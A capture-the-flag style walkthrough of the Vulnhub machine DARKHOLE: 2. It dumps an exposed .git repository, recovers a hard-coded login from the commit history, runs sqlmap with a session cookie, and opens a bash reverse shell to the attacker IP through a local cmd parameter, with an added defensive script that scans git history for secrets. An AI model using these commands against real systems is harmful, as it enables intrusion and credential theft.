title: 'Vulnhub-DARKHOLE: 2'
abbrlink: 334e7ff1
date: 2022-12-02 09:25:19

tags:

Description

Difficulty: Hard

This works better with VMware rather than VirtualBox

Hint: Don't waste your time For Brute-Force


Host discovery with nmap

```
Kali    192.168.169.220
Target  192.168.169.230
```

Scan the target with nmap

```
Ports: 22, 80
Git repository: git leak
```

Directories

Use a git dumping tool

https://github.com/arthaud/git-dumper

  • Run git_dumper.py

```bash
python3 git_dumper.py http://192.168.169.230/.git/ website
```

Inspect the files

A login page that requires an email and password

git log

Review the change history
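Old commits keep whatever was once committed, so a secret removed from the current files is still recoverable from a dumped .git. As an added example (not part of the original write-up), this defender-side check scans `git log -p` output for request fields compared against string literals, on both added and removed lines; the sample log, commit ids, file name, values and `check_login()` are constructed.

```python
import re
# Constructed, trimmed `git log -p` output; ids, file, values and check_login() are made up.
SAMPLE_LOG = """\
commit 3333333aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    make login more secure
diff --git a/login.php b/login.php
--- a/login.php
+++ b/login.php
@@ -2,3 +2,3 @@
-if($_POST['email'] == "admin@example.test" && $_POST['password'] == "changeme"){
+if(check_login($db, $_POST['email'], $_POST['password'])){
commit 2222222bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
    add default credentials
diff --git a/login.php b/login.php
--- a/login.php
+++ b/login.php
@@ -1,2 +1,3 @@
 <?php
+if($_POST['email'] == "admin@example.test" && $_POST['password'] == "changeme"){
"""

# $_POST['field'] == "literal" (also $_GET / $_REQUEST, === and single quotes)
HARDCODED = re.compile(
    r"""\$_(?:POST|GET|REQUEST)\[['"](\w+)['"]\]\s*={2,3}\s*(['"])(.+?)\2""")
SENSITIVE = {"password", "passwd", "pass", "pwd", "token", "secret"}

def scan_history(log_text):
    """Flag added AND removed diff lines; report literal length, never the secret."""
    findings, commit, path, in_hunk = [], None, None, False
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit, in_hunk = line.split()[1][:7], False
        elif line.startswith("diff --git "):
            in_hunk = False
        elif line.startswith("@@"):
            in_hunk = True
        elif not in_hunk and line.startswith(("--- ", "+++ ")):
            if line[4:] != "/dev/null":
                path = line[6:]  # drop git's default "a/" or "b/" prefix
        elif in_hunk and line.startswith(("+", "-")):
            change = "added" if line[0] == "+" else "removed"
            for m in HARDCODED.finditer(line[1:]):
                if m.group(1).lower() in SENSITIVE:
                    findings.append((commit, path, change, m.group(1), len(m.group(3))))
    return findings

if __name__ == "__main__":
    for f in scan_history(SAMPLE_LOG):
        print("%s %s: %s hard-coded %s (literal of %d chars)" % f)
```

The "removed" finding is the important one: the commit that cleaned up the login check is exactly where the old value can be read back, so the credential has to be rotated, not just deleted from the file.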

Found credentials

```php
if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
```

Test the login

The URL shows an injection point

Injection

  • The cookie must be included

```bash
sqlmap -u "http://192.168.169.230/dashboard.php?id=1" --cookie "PHPSESSID=3ca3jbi4mk3749bv84uu4supol" --dbs
```

  • ssh

  • users

ssh

```bash
ssh jehad@192.168.169.230
```

```bash
find / -user root -perm -4000 -print 2>/dev/null
```

  • Check scheduled tasks

```bash
cat /etc/crontab
```

  • Take a look at /opt/web:

```bash
cat /opt/web/index.php
```

  • Check the TCP processes:

```bash
netstat -tlnp
```

It can run commands (cmd)

Write the shell

  • Start a listener
  • URL-encode the command

```bash
bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'
```

```
bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
```

  • Write it

```bash
curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'"
```

  • View the command history

Switch user

Privilege escalation